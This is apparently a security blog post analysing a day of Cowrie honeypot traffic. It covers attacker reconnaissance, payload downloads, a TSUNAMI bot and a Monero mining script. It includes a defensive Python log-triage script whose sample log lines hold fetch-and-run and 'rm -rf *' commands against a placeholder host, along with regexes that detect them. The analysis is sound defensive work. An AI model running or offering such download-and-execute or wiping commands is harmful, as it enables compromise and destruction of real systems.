Honey Pot: Crypto Miner

Mohammed A.
Oct 26, 2021


Every computer, piece of hardware or software, and network on earth is always at risk of being attacked, whether or not it has known vulnerabilities. Many take security precautions to stop attacks with an IPS or to detect them with an IDS, and some deliberately build weak networks (or ordinary ones) and set up honeypots to test and study threat actors and the creative ways they compromise cyberspace. For this reason, I used a honeypot to see what techniques attackers use to compromise that cyberspace. Telekom Security’s honeypot “Tpotce” provides everything I need for thorough threat intelligence: it comes with 19 different honeypots, uses the ELK stack to visualize all the data it collects, and uses SpiderFoot to automate the OSINT process. With the help of the Cowrie honeypot, I looked at a whole day’s worth of traffic to my honeypot to find attack patterns, and at the end I perform an in-depth malware analysis of the crypto mining script an attacker left on my honeypot.

Cowrie Dashboard (Oct18@17:30-Oct19@17:30, 2021)

The purpose of a honeypot is to lure in attackers so that we can dissect their methods and use the collected data to protect our networks as well as possible. So at first I wanted to look at how the attackers try to get in and, once they are in, what they do: which commands they run, what they search for, and so on. The data shows that some attackers perform reconnaissance on the operating system and architecture once they access the honeypot. I looked at the specific commands they ran, and for this timeframe most tried to upload malicious payloads. For my selected period, October 18th, 2021 @ 17:30 to October 19th, 2021 @ 17:00, some of the attacks looked very similar, some even downloading from the same websites although their geographic locations and IPs differ. Below are the commands run by some attackers, their IPs, their locations, and how some of them correlate with one another.

Cowrie Attack Map
Few of the consistent attackers

According to the data collected from the Cowrie honeypot, the geographic locations indicate that the attackers in the chart above are separate threat actors. But if we look at the first of them, FranTech Solutions, two different IP addresses from two different geographic locations use two separate command sequences to get results; these could be two separate attackers who both use FranTech to throw off any trace. One of them tries to download some sort of payload into the /tmp directory but fails to execute the downloaded file, and the other successfully downloads some sort of crypto mining script onto the honeypot server. If we further analyze the third and fourth attacks, UAB Host Baltic and Anton Mamaev, we notice that both begin their attack with the same command to act as a superuser, but the third carries on with a few more commands to make sure the server can no longer be accessed with its original user credentials. Lastly, for the second one, we can say the attacker is using busybox to run TSUNAMI, executable malware that gathers sensitive information on devices connected to the network and turns the infected system into a bot.

I wanted to download and analyze a few of the malware samples and the commands run on the honeypot. I noticed that the first attacker, hosted by FranTech Solutions under different IPs, was downloading payloads from different URLs (see table: Few of the consistent attackers).

If we break down the commands from the first FranTech Solutions attack, we can see that the attacker first checks the OS by typing “cat /etc/issue”, then changes directory to /tmp and downloads the malware, but fails to execute it properly, lacking the final “rm -rf *” that would finish the process.
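As an added example (not code from the post, from T-Pot, or from Cowrie), the script below triages Cowrie-style JSON log lines for the command sequence described above, so a defender can pull sessions that staged, fetched and ran a payload out of a day's worth of traffic. The log lines are constructed for this example, and the field names eventid, session, src_ip and input are assumed to match Cowrie's JSON output.

```python
import json
import re
from collections import defaultdict

# Constructed Cowrie-style events (not real honeypot data); field names are
# assumed to match Cowrie's JSON log format.
SAMPLE_LOG = """
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","input":"cat /etc/issue"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","input":"cd /tmp"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","input":"wget http://example.invalid/x.sh"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","input":"chmod +x x.sh; ./x.sh"}
{"eventid":"cowrie.command.input","session":"a1","src_ip":"198.51.100.7","input":"rm -rf *"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"203.0.113.9","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"203.0.113.9","input":"ls"}
{"eventid":"cowrie.login.success","session":"b2","src_ip":"203.0.113.9","username":"root"}
"""

# One regex per stage of the pattern seen in the post: OS reconnaissance,
# move to a world-writable directory, fetch a payload, run it, wipe the traces.
STAGES = {
    "recon": re.compile(r"\b(cat /etc/issue|uname -a)\b"),
    "staging_dir": re.compile(r"\bcd /tmp\b"),
    "download": re.compile(r"\b(wget|curl)\b"),
    "execute": re.compile(r"(chmod \+x|\./\S+)"),
    "cleanup": re.compile(r"\brm -rf \*"),
}


def triage(log_text):
    """Group command inputs by session and record which stages each session hit."""
    sessions = defaultdict(lambda: {"src_ip": None, "stages": set()})
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue  # logins, file downloads etc. are not command input
        entry = sessions[event["session"]]
        entry["src_ip"] = event.get("src_ip")
        for name, pattern in STAGES.items():
            if pattern.search(event["input"]):
                entry["stages"].add(name)
    return dict(sessions)


def suspicious_sessions(log_text, required=("download", "execute")):
    """Sessions that both fetched and ran something deserve a closer look."""
    return {sid: info for sid, info in triage(log_text).items()
            if all(stage in info["stages"] for stage in required)}


if __name__ == "__main__":
    for sid, info in suspicious_sessions(SAMPLE_LOG).items():
        print(sid, info["src_ip"], sorted(info["stages"]))
```

Sessions that only ran reconnaissance commands (like b2 above) are kept in the triage output but not flagged, so the threshold can be tightened or loosened per stage.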

Proper execution of commands from the above

When I navigated to the second URL, I noticed that this was a script for a cryptocurrency miner, as we can see in the screenshot below.

I noticed that the attacker downloads the mining script onto the honeypot. We assumed the value is a wallet address because the script runs a length check on a variable named WALLET_BASE, verifying that its length equals 106 or 95.

Using CPU to mine Monero in the background without the host ever knowing about it

Although the commands from these two IP addresses are not similar, both have FranTech Solutions in common. We cannot know for certain whether the attacks come from the same person without more data, since one of them seems to have failed to execute while the other succeeded.

In conclusion, my honeypot was able to gather and monitor attacks and log all of the attackers' inputs, furthering my understanding of the various attack techniques and malicious files used in attempts to exploit my honeypot.
